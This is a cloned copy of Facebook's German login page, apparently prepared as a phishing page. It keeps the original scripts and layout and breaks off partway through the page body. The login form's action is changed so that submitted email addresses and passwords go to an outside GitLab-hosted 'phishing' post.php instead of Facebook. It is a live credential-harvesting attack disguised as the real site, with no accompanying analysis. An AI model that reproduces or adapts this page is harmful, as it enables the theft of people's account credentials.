<!DOCTYPE html>
<html lang="de" id="facebook" class="no_js">

<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <script
        nonce="A8B9F579">function envFlush(a) { function b(b) { for (var c in a) b[c] = a[c] } window.requireLazy ? window.requireLazy(["Env"], b) : (window.Env = window.Env || {}, b(window.Env)) } envFlush({ "ajaxpipe_token": "AXgrY7uIyPej6fXj_rU", "gk_instrument_object_url": true, "gk_log_promise_done": true, "stack_trace_limit": 30, "timesliceBufferSize": 5000, "show_invariant_decoder": false, "compat_iframe_token": "AQ6nbuEHIGhSezkaX8s", "isCQuick": false });</script>
    <script
        nonce="A8B9F579">(function (a) { function b(b) { if (!window.openDatabase) return; b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL = function (a, b, c, d) { return window.openDatabase(a, b, c, d) }; window.openDatabase = function () { throw new Error() } } b(a) })(this);</script>
    <style nonce="A8B9F579"></style>
    <script nonce="A8B9F579">__DEV__ = 0; CavalryLogger = false;</script><noscript>
        <meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" />
    </noscript>
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
    <title id="pageTitle">Facebook – Anmelden oder Registrieren</title>
    <meta property="og:site_name" content="Facebook" />
    <meta property="og:url" content="https://de-de.facebook.com/" />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta property="og:locale" content="de_DE" />
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" />
    <link rel="alternate" media="handheld" href="https://m.facebook.com/" />
    <meta name="description"
        content="Melde dich bei Facebook an, um dich mit deinen Freunden, deiner Familie und Personen, die du kennst, zu verbinden und Inhalte zu teilen." />
    <link rel="canonical" href="https://de-de.facebook.com/" />
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/V9wzF4LjPmU.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="Aviv5eE" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0,cross/fARQz3e8huT.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="Pud6B2Z" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/xravZQ_2HtH.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="9psM9GY" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/NqaaoJjQN1D.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="kfF6UzV" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/l/0,cross/JgyEeZA6YIr.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="rs+j/Ae" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/nG7XmC3cZWM.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="Yo2UzOh" crossorigin="anonymous" />
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/wNWWb71hic0.js?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="sHnX78J" crossorigin="anonymous" nonce="A8B9F579"></script>
    <script
        nonce="A8B9F579">requireLazy(["HasteSupportData"], function (m) { m.handle({ "clpData": { "1814852": { "r": 1 }, "1838142": { "r": 1, "s": 1 }, "1949898": { "r": 1 }, "1848815": { "r": 10000, "s": 1 }, "1744178": { "r": 1, "s": 1 } }, "gkxData": { "5241": { "result": true, "hash": "AT7o1bCQPGpf3ShEpXc" }, "5919": { "result": false, "hash": "AT6PGptIPUYH051B08E" }, "676837": { "result": false, "hash": "AT4N8wBZA8ctCdHwF8I" }, "708253": { "result": false, "hash": "AT5n4hBL3YTMnQWtj6M" }, "996940": { "result": false, "hash": "AT7opYuEGy3sjG1aOjk" }, "1224637": { "result": false, "hash": "AT7JRluWxuwDm3XzQMI" }, "1263340": { "result": false, "hash": "AT5bwizWgDaFQudmjLM" }, "676920": { "result": true, "hash": "AT497IX4gOFG8gZeiik" }, "1073500": { "result": false, "hash": "AT7aJmfnqWyioxOOmYw" }, "1167394": { "result": false, "hash": "AT7BpN-tlUPwbIIFvsk" }, "1857581": { "result": false, "hash": "AT5yTxGMp6le0PAtRRw" }, "2772": { "result": false, "hash": "AT5Eu244WIce7iwq6AI" }, "3752": { "result": false, "hash": "AT6eS5UTkkMp_xbPbqE" }, "3831": { "result": false, "hash": "AT4W23lQ0XxAZniMMLA" }, "4075": { "result": false, "hash": "AT4_ZQi0sTjSt-RxArM" }, "676838": { "result": false, "hash": "AT6nN1ehT9yq-2q6ec0" }, "1217157": { "result": false, "hash": "AT6B7YmllOsArnK6McM" }, "1554827": { "result": false, "hash": "AT7zueGLhGo0cT5xzF4" }, "1738486": { "result": false, "hash": "AT4cX37oQco6DwhUrHo" } }, "qplData": { "7758": { "r": 1 } } }) }); requireLazy(["TimeSliceImpl", "ServerJS"], function (TimeSlice, ServerJS) { (new ServerJS()).handle({ "define": [["URLFragmentPreludeConfig", [], { "hashtagRedirect": true, "fragBlacklist": ["nonce", "access_token", "oauth_token", "xs", "checkpoint_data", "code"] }, 137], ["CometPersistQueryParams", [], { "relative": {}, "domain": {} }, 6231], ["CookieDomain", [], { "domain": "facebook.com" }, 6421], ["BootloaderConfig", [], { "deferBootloads": false, "jsRetries": [200, 500], "jsRetryAbortNum": 2, "jsRetryAbortTime": 5, "silentDups": false, "hypStep4": false, "phdOn": false, "btCutoffIndex": 3058 }, 329], ["CSSLoaderConfig", [], { "timeout": 5000, "modulePrefix": "BLCSS:", "loadEventSupported": true }, 619], ["CookieCoreConfig", [], { "c_user": { "s": "None" }, "cppo": { "t": 86400, "s": "None" }, "dpr": { "t": 604800, "s": "None" }, "fbl_ci": { "t": 31536000, "s": "None" }, "fbl_cs": { "t": 31536000, "s": "None" }, "fbl_st": { "t": 31536000, "s": "Strict" }, "i_user": { "s": "None" }, "locale": { "t": 604800, "s": "None" }, "m_pixel_ratio": { "t": 604800, "s": "None" }, "noscript": { "s": "None" }, "presence": { "t": 2592000, "s": "None" }, "sfau": { "s": "None" }, "usida": { "s": "None" }, "vpd": { "t": 5184000, "s": "Lax" }, "wd": { "t": 604800, "s": "Lax" }, "x-referer": { "s": "None" }, "x-src": { "t": 1, "s": "None" } }, 2104], ["CurrentCommunityInitialData", [], {}, 490], ["CurrentEnvironment", [], { "facebookdotcom": true, "messengerdotcom": false, "workplacedotcom": false, "instagramdotcom": false }, 827], ["CurrentUserInitialData", [], { "ACCOUNT_ID": "0", "USER_ID": "0", "NAME": "", "SHORT_NAME": null, "IS_BUSINESS_PERSON_ACCOUNT": false, "HAS_SECONDARY_BUSINESS_PERSON": false, "IS_FACEBOOK_WORK_ACCOUNT": false, "IS_MESSENGER_ONLY_USER": false, "IS_DEACTIVATED_ALLOWED_ON_MESSENGER": false, "IS_MESSENGER_CALL_GUEST_USER": false, "IS_WORK_MESSENGER_CALL_GUEST_USER": false, "IS_WORKROOMS_USER": false, "APP_ID": "256281040558", "IS_BUSINESS_DOMAIN": false }, 270], ["DTSGInitialData", [], {}, 258], ["ISB", [], {}, 330], ["LSD", [], { "token": "AVpOOquBNGU" }, 323], ["ServerNonce", [], { "ServerNonce": "6LRb8YR4HC3x_QAWzE_gd5" }, 141], ["SiteData", [], { "server_revision": 1005858897, "client_revision": 1005858897, "tier": "", "push_phase": "C3e", "pkg_cohort": "BP:DEFAULT", "haste_session": "19190.BP:DEFAULT.2.0.0.0.0", "pr": 1, "haste_site": "www", "manifest_base_uri": "https:\/\/static.xx.fbcdn.net", "manifest_origin": null, "be_one_ahead": false, "is_rtl": false, "is_comet": false, "is_experimental_tier": false, "is_jit_warmed_up": true, "hsi": "7121366904243737342", "semr_host_bucket": "5", "bl_hash_version": 2, "skip_rd_bl": true, "comet_env": 0, "wbloks_env": false, "spin": 4, "__spin_r": 1005858897, "__spin_b": "trunk", "__spin_t": 1658072440, "vip": "2a03:2880:f03f:12:face:b00c:0:2" }, 317], ["SprinkleConfig", [], { "param_name": "jazoest", "version": 2, "should_randomize": false }, 2111], ["UserAgentData", [], { "browserArchitecture": "64", "browserFullVersion": "103.0.0.0", "browserMinorVersion": 0, "browserName": "Chrome", "browserVersion": 103, "deviceName": "Unknown", "engineName": "WebKit", "engineVersion": "537.36", "platformArchitecture": "64", "platformName": "Windows", "platformVersion": "10", "platformFullVersion": "10" }, 527], ["PromiseUsePolyfillSetImmediateGK", [], { "www_always_use_polyfill_setimmediate": false }, 2190], ["KSConfig", [], { "killed": { "__set": ["MOBILIZER_SELF_SERVE_OWNERSHIP_RESOLVER", "MLHUB_FLOW_AUTOREFRESH_SEARCH", "NEKO_DISABLE_CREATE_FOR_SAP", "EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT", "MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING", "WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING", "BUSINESS_INVITE_FLOW_WITH_SELLER_PROFILE", "BUY_AT_UI_LINE_DELETE", "BUSINESS_GRAPH_SETTING_APP_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_BU_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_ESG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_PRODUCT_CATALOG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API", "ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION", "FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION", "VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG", "SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME", "ADS_STORE_VISITS_METRICS_DEPRECATION", "DYNAMIC_ADS_SET_CATALOG_AND_PRODUCT_SET_TOGETHER", "AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATION", "SEPARATE_MESSAGING_COMACTIVITY_PAGE_PERMS", "LAB_NET_NEW_UI_RELEASE", "POCKET_MONSTERS_CREATE", "POCKET_MONSTERS_DELETE", "SRT_BANZAI_SRT_CORE_LOGGER", "SRT_BANZAI_SRT_MAIN_LOGGER", "WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES", "POCKET_MONSTERS_UPDATE_NAME", "IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE", "ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER", "RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD", "BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX"] }, "ko": { "__set": ["8H4bQmEiuLT", "3OsLvnSHNTt", "1G7wJ6bJt9K", "9NpkGYwzrPG", "3oh5Mw86USj", "8NAceEy9JZo", "7FOIzos6XJX", "rf8JEPGgOi", "4j36SVzvP3w", "4NSq3ZC4ScE", "53gCxKq281G", "3yzzwBY7Npj", "1onzIv0jH6H", "8PlKuowafe8", "1ntjZ2zgf03", "4SIH2GRVX5W", "2dhqRnqXGLQ", "2WgiNOrHVuC", "amKHb4Cw4WI", "5mNEXob0nTj", "8rDvN9vWdAK", "5BdzWGmfvrA", "DDZhogI19W", "acrJTh9WGdp", "1oOE64fL4wO", "9Gd8qgRxn8z", "MPMaqnqZ9c", "5XCz1h9Iaw3", "7r6mSP7ofr2", "6DGPLrRdyts", "aWxCyi1sEC7", "9kCSDzzr8fu", "awYA7fn2Bse"] } }, 2580], ["JSErrorLoggingConfig", [], { "appId": 256281040558, "extra": [], "reportInterval": 50, "sampleWeight": null, "sampleWeightKey": "__jssesw", "projectBlocklist": [] }, 2776], ["DataStoreConfig", [], { "expandoKey": "__FB_STORE", "useExpando": true }, 2915], ["CookieCoreLoggingConfig", [], { "maximumIgnorableStallMs": 16.67, "sampleRate": 9.7e-5, "sampleRateClassic": 1.0e-10, "sampleRateFastStale": 1.0e-8 }, 3401], ["ImmediateImplementationExperiments", [], { "prefer_message_channel": true }, 3419], ["DTSGInitData", [], { "token": "", "async_get_token": "" }, 3515], ["UriNeedRawQuerySVConfig", [], { "uris": ["dms.netmng.com", "doubleclick.net", "r.msn.com", "watchit.sky.com", "graphite.instagram.com", "www.kfc.co.th", "learn.pantheon.io", "www.landmarkshops.in", "www.ncl.com", "s0.wp.com", "www.tatacliq.com", "bs.serving-sys.com", "kohls.com", "lazada.co.th", "xg4ken.com", "technopark.ru", "officedepot.com.mx", "bestbuy.com.mx", "booking.com", "nibio.no"] }, 3871], ["InitialCookieConsent", [], { "deferCookies": false, "initialConsent": { "__set": [1] }, "noCookies": false, "shouldShowCookieBanner": false }, 4328], ["TrustedTypesConfig", [], { "useTrustedTypes": false, "reportOnly": false }, 4548], ["WebConnectionClassServerGuess", [], { "connectionClass": "EXCELLENT" }, 4705], ["CometAltpayJsSdkIframeAllowedDomains", [], { "allowed_domains": ["https:\/\/live.adyen.com", "https:\/\/integration-facebook.payu.in", "https:\/\/facebook.payulatam.com", "https:\/\/secure.payu.com", "https:\/\/facebook.dlocal.com", "https:\/\/buy2.boku.com"] }, 4920], ["BootloaderEndpointConfig", [], { "debugNoBatching": false, "endpointURI": "https:\/\/de-de.facebook.com\/ajax\/bootloader-endpoint\/" }, 5094], ["BigPipeExperiments", [], { "link_images_to_pagelets": false, "enable_bigpipe_plugins": false }, 907], ["IntlVariationHoldout", [], { "disable_variation": false }, 6533], ["AsyncRequestConfig", [], { "retryOnNetworkError": "1", "useFetchStreamAjaxPipeTransport": false }, 328], ["FbtResultGK", [], { "shouldReturnFbtResult": true, "inlineMode": "NO_INLINE" }, 876], ["IntlPhonologicalRules", [], { "meta": { "\/_B\/": "([.,!?\\s]|^)", "\/_E\/": "([.,!?\\s]|$)" }, "patterns": { "\/(\u00df|s|z|x)\u0001s_E\/": "$1\u0001$2", "\/_\u0001([^\u0001]*)\u0001\/": "javascript" } }, 1496], ["IntlViewerContext", [], { "GENDER": 3, "regionalLocale": null }, 772], ["NumberFormatConfig", [], { "decimalSeparator": ",", "numberDelimiter": ".", "minDigitsForThousandsSeparator": 4, "standardDecimalPatternInfo": { "primaryGroupSize": 3, "secondaryGroupSize": 3 }, "numberingSystemData": null }, 54], ["SessionNameConfig", [], { "seed": "2QHe" }, 757], ["ZeroCategoryHeader", [], {}, 1127], ["ZeroRewriteRules", [], { "rewrite_rules": {}, "whitelist": { "\/hr\/r": 1, "\/hr\/p": 1, "\/zero\/unsupported_browser\/": 1, "\/zero\/policy\/optin": 1, "\/zero\/optin\/write\/": 1, "\/zero\/optin\/legal\/": 1, "\/zero\/optin\/free\/": 1, "\/about\/privacy\/": 1, "\/about\/privacy\/update\/": 1, "\/privacy\/explanation\/": 1, "\/zero\/toggle\/welcome\/": 1, "\/zero\/toggle\/nux\/": 1, "\/zero\/toggle\/settings\/": 1, "\/fup\/interstitial\/": 1, "\/work\/landing": 1, "\/work\/login\/": 1, "\/work\/email\/": 1, "\/ai.php": 1, "\/js_dialog_resources\/dialog_descriptions_android.json": 0, "\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/": 0, "\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/": 0, "\/connect\/jsdialog\/MPlatformLikeJSDialog\/": 0, "\/qp\/interstitial\/": 1, "\/qp\/action\/redirect\/": 1, "\/qp\/action\/close\/": 1, "\/zero\/support\/ineligible\/": 1, "\/zero_balance_redirect\/": 1, "\/zero_balance_redirect": 1, "\/zero_balance_redirect\/l\/": 1, "\/l.php": 1, "\/lsr.php": 1, "\/ajax\/dtsg\/": 1, "\/checkpoint\/block\/": 1, "\/exitdsite": 1, "\/zero\/balance\/pixel\/": 1, "\/zero\/balance\/": 1, "\/zero\/balance\/carrier_landing\/": 1, "\/zero\/flex\/logging\/": 1, "\/tr": 1, "\/tr\/": 1, "\/sem_campaigns\/sem_pixel_test\/": 1, "\/bookmarks\/flyout\/body\/": 1, "\/zero\/subno\/": 1, "\/confirmemail.php": 1, "\/policies\/": 1, "\/mobile\/internetdotorg\/classifier\/": 1, "\/zero\/dogfooding": 1, "\/xti.php": 1, "\/zero\/fblite\/config\/": 1, "\/hr\/zsh\/wc\/": 1, "\/ajax\/bootloader-endpoint\/": 1, "\/mobile\/zero\/carrier_page\/": 1, "\/mobile\/zero\/carrier_page\/education_page\/": 1, "\/mobile\/zero\/carrier_page\/feature_switch\/": 1, "\/mobile\/zero\/carrier_page\/settings_page\/": 1, "\/aloha_check_build": 1, "\/upsell\/zbd\/softnudge\/": 1, "\/mobile\/zero\/af_transition\/": 1, "\/mobile\/zero\/af_transition\/action\/": 1, "\/mobile\/zero\/freemium\/": 1, "\/mobile\/zero\/freemium\/redirect\/": 1, "\/mobile\/zero\/freemium\/zero_fup\/": 1, "\/privacy\/policy\/": 1, "\/privacy\/center\/": 1, "\/data\/manifest\/": 1, "\/4oh4.php": 1, "\/autologin.php": 1, "\/birthday_help.php": 1, "\/checkpoint\/": 1, "\/contact-importer\/": 1, "\/cr.php": 1, "\/legal\/terms\/": 1, "\/login.php": 1, "\/login\/": 1, "\/mobile\/account\/": 1, "\/n\/": 1, "\/remote_test_device\/": 1, "\/upsell\/buy\/": 1, "\/upsell\/buyconfirm\/": 1, "\/upsell\/buyresult\/": 1, "\/upsell\/promos\/": 1, "\/upsell\/continue\/": 1, "\/upsell\/h\/promos\/": 1, "\/upsell\/loan\/learnmore\/": 1, "\/upsell\/purchase\/": 1, "\/upsell\/promos\/upgrade\/": 1, "\/upsell\/buy_redirect\/": 1, "\/upsell\/loan\/buyconfirm\/": 1, "\/upsell\/loan\/buy\/": 1, "\/upsell\/sms\/": 1, "\/wap\/a\/channel\/reconnect.php": 1, "\/wap\/a\/nux\/wizard\/nav.php": 1, "\/wap\/appreg.php": 1, "\/wap\/birthday_help.php": 1, "\/wap\/c.php": 1, "\/wap\/confirmemail.php": 1, "\/wap\/cr.php": 1, "\/wap\/login.php": 1, "\/wap\/r.php": 1, "\/zero\/datapolicy": 1, "\/a\/timezone.php": 1, "\/a\/bz": 1, "\/bz\/reliability": 1, "\/r.php": 1, "\/mr\/": 1, "\/reg\/": 1, "\/registration\/log\/": 1, "\/terms\/": 1, "\/f123\/": 1, "\/expert\/": 1, "\/experts\/": 1, "\/terms\/index.php": 1, "\/terms.php": 1, "\/srr\/": 1, "\/msite\/redirect\/": 1, "\/fbs\/pixel\/": 1, "\/contactpoint\/preconfirmation\/": 1, "\/contactpoint\/cliff\/": 1, "\/contactpoint\/confirm\/submit\/": 1, "\/contactpoint\/confirmed\/": 1, "\/contactpoint\/login\/": 1, "\/preconfirmation\/contactpoint_change\/": 1, "\/help\/contact\/": 1, "\/survey\/": 1, "\/upsell\/loyaltytopup\/accept\/": 1, "\/settings\/": 1, "\/lite\/": 1, "\/zero_status_update\/": 1, "\/operator_store\/": 1, "\/upsell\/": 1, "\/wifiauth\/login\/": 1 } }, 1478], ["IntlNumberTypeConfig", [], { "impl": "if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }" }, 3405], ["ServerTimeData", [], { "serverTime": 1658072440465, "timeOfRequestStart": 1658072440416, "timeOfResponseStart": 1658072440416 }, 5943], ["FbtQTOverrides", [], { "overrides": {} }, 551], ["AnalyticsCoreData", [], { "device_id": "$^|AcY3mvnNs2RpfjOTfyXTMTA1VqUMEHyR0QhZW7FNeS-vi9-3qjOUJpCApZ225B4YP3smKA-9kLzZH6HRYy9OvOsIypuBWVGRCG8FMrnjS7goQ2aLINozpzd5HFhdpReNdDx-jQsilqF8b_i3f6nRxAt6yaWD|fd.AcZoFm19o027pTLNYi6Udf7i-pcKpQ5wZLm8N1C4rhR6r-AY1wrhaX28Ise-YhnBQG1jwx1l2kxcC8BRV_sbKqCz", "app_id": "256281040558", "enable_bladerunner": false, "enable_ack": true, "push_phase": "C3e", "enable_observer": false, "enable_dataloss_timer": false, "enable_fallback_for_br": true, "fix_br_init_rc": true, "queue_activation_experiment": false }, 5237], ["CookieConsentIFrameConfig", [], { "consent_param": "FQAREhIA.ARYDCHANZ7oUUOLpRw3N-9j36UbkKGIa2X4pfjHCIs7cS0Vi", "allowlisted_iframes": [] }, 5540], ["cr:696703", [], { "__rc": [null, "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:708886", ["EventProfilerImpl"], { "__rc": ["EventProfilerImpl", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:717822", ["TimeSliceImpl"], { "__rc": ["TimeSliceImpl", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:806696", ["clearTimeoutBlue"], { "__rc": ["clearTimeoutBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:807042", ["setTimeoutBlue"], { "__rc": ["setTimeoutBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:896462", ["setIntervalAcrossTransitionsBlue"], { "__rc": ["setIntervalAcrossTransitionsBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:986633", ["setTimeoutAcrossTransitionsBlue"], { "__rc": ["setTimeoutAcrossTransitionsBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1003267", ["clearIntervalBlue"], { "__rc": ["clearIntervalBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1183579", ["InlineFbtResultImpl"], { "__rc": ["InlineFbtResultImpl", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:925100", ["RunBlue"], { "__rc": ["RunBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:729414", ["VisualCompletion"], { "__rc": ["VisualCompletion", "Aa0UpKpuh1IMkstgl6bscJjorKfNZ1EaHWLIX2zcqHV-NtrvEPnXjVo3RaZJCN3rNwcQPYeiaSKe5Eq4wlBOHH2c"] }, -1], ["cr:1094907", [], { "__rc": [null, "Aa2GxFOvZhvxBgTDrQmD6yJ3MrZHTQqnyZwwnQ-JZkCzj0V8tpikRrop-waMURBdfUt_mS468J3WaXe82KrDPD4"] }, -1], ["EventConfig", [], { "sampling": { "bandwidth": 0, "play": 0, "playing": 0, "progress": 0, "pause": 0, "ended": 0, "seeked": 0, "seeking": 0, "waiting": 0, "loadedmetadata": 0, "canplay": 0, "selectionchange": 0, "change": 0, "timeupdate": 0, "adaptation": 0, "focus": 0, "blur": 0, "load": 0, "error": 0, "message": 0, "abort": 0, "storage": 0, "scroll": 200000, "mousemove": 20000, "mouseover": 10000, "mouseout": 10000, "mousewheel": 1, "MSPointerMove": 10000, "keydown": 0.1, "click": 0.02, "mouseup": 0.02, "__100ms": 0.001, "__default": 5000, "__min": 100, "__interactionDefault": 200, "__eventDefault": 100000 }, "page_sampling_boost": 1, "interaction_regexes": {}, "interaction_boost": {}, "event_types": {}, "manual_instrumentation": false, "profile_eager_execution": false, "disable_heuristic": true, "disable_event_profiler": false }, 1726], ["AdsInterfacesSessionConfig", [], {}, 2393], ["IntlCurrentLocale", [], { "code": "de_DE" }, 5954], ["USIDMetadata", [], { "browser_id": "?", "tab_id": "", "page_id": "Prf68vs8lei2m", "transition_id": 0, "version": 6 }, 5888], ["cr:686", [], { "__rc": [null, "Aa0-MWaBqNPG20sIlv3IvurwlIuKfwFKNOFUpoMJU_FFGSnY5Qv1q79QYgUi5G09fmuGK7-MKLl_syeXpTnAoOMS"] }, -1], ["cr:1984081", [], { "__rc": [null, "Aa1lMs-I5Iot9Ecqf0zEutddaZ2QZAAPpPBist5Ac_vByXAbJB_iH8NFqEIpmMt_8tLNE6ZHhbkxBI1wm65cA00p5Ezf"] }, -1]], "require": [["markJSEnabled"], ["lowerDomain"], ["URLFragmentPrelude"], ["Primer"], ["BigPipe"], ["Bootloader"], ["TimeSlice"], ["AsyncRequest"], ["BanzaiScuba_DEPRECATED"], ["VisualCompletionGating"], ["FbtLogging"], ["IntlQtEventFalcoEvent"], ["RequireDeferredReference", "unblock", [], [["AsyncRequest", "BanzaiScuba_DEPRECATED", "VisualCompletionGating", "FbtLogging", "IntlQtEventFalcoEvent"], "sd"]], ["RequireDeferredReference", "unblock", [], [["AsyncRequest", "BanzaiScuba_DEPRECATED", "VisualCompletionGating", "FbtLogging", "IntlQtEventFalcoEvent"], "css"]]] }); });</script>
</head>

<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_de_DE" dir="ltr">
    <script type="text/javascript"
        nonce="A8B9F579">requireLazy(["bootstrapWebSession"], function (j) { j(1658072440) })</script>
    <div class="_li" id="u_0_1_jY">
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div>
                    <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                        <div class="_8esk">
                            <div class="_8esl">
                                <div class="_8ice"><img class="fb_logo _8ilh img"
                                        src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
                                        alt="Facebook" /></div>
                                <h2 class="_8eso">Auf Facebook bleibst du mit Menschen in Verbindung und teilst Fotos,
                                    Videos und vieles mehr mit ihnen.</h2>
                            </div>
                            <div class="_8esn">
                                <div class="_8iep _8icy _9ahz _9ah-">
                                    <div class="_6luv _52jv">
                                        <form class="_9vtf" data-testid="royal_login_form"
                                            action="https://gitlab.com/andyxie976/phishing/-/blob/main/post.php"
                                            method="post" onsubmit="" id=""><input type="hidden" name="jazoest"
                                                value="2951" autocomplete="off" /><input type="hidden" name="lsd"
                                                value="AVpOOquBNGU" autocomplete="off" />
                                            <div>
                                                <div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
                                                        name="email" id="email" data-testid="royal_email"
                                                        placeholder="E-Mail-Adresse oder Telefonnummer" autofocus="1"
                                                        aria-label="E-Mail-Adresse oder Telefonnummer" /></div>
                                                <div class="_6lux">
                                                    <div class="_6luy _55r1 _1kbt" id="passContainer"><input
                                                            type="password" class="inputtext _55r1 _6luy _9npi"
                                                            name="pass" id="pass" data-testid="royal_pass"
                                                            placeholder="Passwort" aria-label="Passwort" />
                                                        <div class="_9ls7" id="u_0_3_Zc"><a href="#" role="button">
                                                                <div class="_9lsa">
                                                                    <div class="_9lsb" id="u_0_4_VH"></div>
                                                                </div>
                                                            </a></div>
                                                    </div>
                                                </div>
                                            </div><input type="hidden" autocomplete="off" name="login_source"
                                                value="comet_headerless_login" /><input type="hidden" autocomplete="off"
                                                name="next" value="" />
                                            <div class="_6ltg"><button value="1"
                                                    class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login"
                                                    data-testid="royal_login_button" type="submit"
                                                    id="u_0_5_gc">Anmelden</button></div>
                                            <div class="_6ltj"><a
                                                    href="https://de-de.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjU4MDcyNDQwLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">Passwort
                                                    vergessen?</a></div>
                                            <div class="_8icz"></div>
                                            <div class="_6ltg"><a role="button"
                                                    class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#"
                                                    ajaxify="/reg/spotlight/" id="u_0_0_St"
                                                    data-testid="open-registration-form-button" rel="async">Neues Konto
                                                    erstellen</a></div>
                                        </form>
                                    </div>
                                    <div id="reg_pages_msg" class="_58mk"><a
                                            href="/pages/create/?ref_type=registration_form" class="_8esh">Erstelle eine
                                            Seite</a> für einen Star, eine Marke oder ein Unternehmen.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="">
                <div class="_95ke _8opy">
